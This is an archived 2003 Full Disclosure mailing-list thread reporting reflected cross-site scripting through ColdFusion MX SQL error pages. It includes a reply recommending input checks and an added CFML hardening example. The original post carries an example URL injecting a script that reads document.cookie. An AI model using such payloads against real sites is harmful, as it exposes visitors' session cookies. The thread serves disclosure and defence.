Full Disclosure mailing list archives
RE: ColdFusion SQL Error Pages XSS
From: "Keith Kikta - iLand Internet Solutions Corp." <keith.kikta () iland com>
Date: Wed, 15 Oct 2003 16:26:36 -0500
The code should check the value of "id".
Like:

<cfif isnumeric(ID)>
    Proceed
<cfelse>
    Custom Error...
</cfif>

This has always been in ColdFusion. It is desired functionality. Whether or not the coder wanted this to happen is his/her problem, not Macromedia.

-----Original Message-----
From: Lorenzo Hernandez Garcia-Hierro [mailto:lorenzohgh () nsrg-security com]
Sent: Wednesday, October 15, 2003 3:37 PM
To: Full-Disclosure
Cc: BUGTRAQ
Subject: ColdFusion SQL Error Pages XSS

----------
NOTE ABOUT COLDFUSION XSS ATTACKS
_______
Vendor: Macromedia
Versions: MX ( 6.0 ) tested , older ?
_______
PROBLEM:
When you access an SQL error page you can insert XSS code to be shown in the error output of the SQL backend.

example:
http://[target]/article.cfm?id=1'<script>alert(document.cookie);</script>

the output:

Error Occurred While Processing Request
Error Diagnostic Information
[SQL SERVER] Error Code = code
SQL SERVER-XXXX: SQL command not properly ended
SQL = "SELECT article AS articleID FROM articlesnews WHERE newsID = 1'[HERE COMES THE XSS THAT IS EXECUTED]
Data Source = "XXXXXXXXXXXXXXXXXXXXXX"
The error occurred while processing an element with a general identifier of (CFQUERY), occupying document position (7:2) to (7:58) in the template file /xxxxxxxxxxxxxxxxxxxx/articles.cfm.
Date/Time: Moof 2003
Browser: Browserio
Remote Address: xxx.xxx.xxx.xxx
Query String: id=1'[again executed the xss attack]
Please inform the site administrator that this error has occurred (be sure to include the contents of this page in your message to the administrator).

-----
CONTACT INFO:
-------------------------------
0x00->Lorenzo Hernandez Garcia-Hierro
0x01->/* not csh but sh */
0x02->$ PATH=pretending!/usr/ucb/which sense
0x03-> no sense in pretending!
__________________________________
PGP: Keyfingerprint
4ACC D892 05F9 74F1 F453 7D62 6B4E B53E 9180 5F5B
ID: 0x91805F5B
**********************************
No Secure Root Group Security Research Team
http://www.nsrg-security.com
______________________
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
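
The input check suggested in the reply, carried through as an added CFML example (not code from either poster or from Macromedia): it validates the id, binds it as a typed parameter, and replaces the diagnostic error page with a fixed message. The table and column names come from the error output quoted above; the data source name exampleDSN, the log file name and the user-facing messages are assumptions.

```cfml
<!--- article.cfm, hardened form (added example; exampleDSN, the log file name
      and the messages are assumed, not taken from the original report) --->
<cfparam name="url.id" default="">

<!--- 1. Validate. IsNumeric also accepts values such as 1.5 or 1e3, so the
      check here is tightened to a short run of digits only. --->
<cfif NOT REFind("^[0-9]{1,9}$", url.id)>
    <cfheader statuscode="400" statustext="Bad Request">
    <cfoutput>Invalid article id.</cfoutput>
    <cfabort>
</cfif>

<cftry>
    <!--- 2. Bind. cfqueryparam sends the value as a typed parameter, so it
          never becomes part of the SQL text that an error page could echo. --->
    <cfquery name="getArticle" datasource="exampleDSN">
        SELECT article AS articleID
        FROM articlesnews
        WHERE newsID = <cfqueryparam value="#url.id#" cfsqltype="cf_sql_integer">
    </cfquery>

    <cfcatch type="database">
        <!--- 3. Contain. Keep the driver detail in a server-side log and show
              the visitor a fixed message: no SQL, no query string, no path. --->
        <cflog file="article_errors" type="error" text="Query failed: #cfcatch.message#">
        <cfheader statuscode="500" statustext="Internal Server Error">
        <cfoutput>The article could not be loaded.</cfoutput>
        <cfabort>
    </cfcatch>
</cftry>

<cfoutput query="getArticle">
    <!--- 4. Encode on output, whatever the source of the value. --->
    #HTMLEditFormat(getArticle.articleID)#
</cfoutput>
```

Templates that cannot be changed one by one are still covered by step 3 if detailed error output is switched off server-wide and a site-wide error handler is configured in its place.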
Current thread:
- ColdFusion SQL Error Pages XSS Lorenzo Hernandez Garcia-Hierro (Oct 15)
- <Possible follow-ups>
- RE: ColdFusion SQL Error Pages XSS Keith Kikta - iLand Internet Solutions Corp. (Oct 15)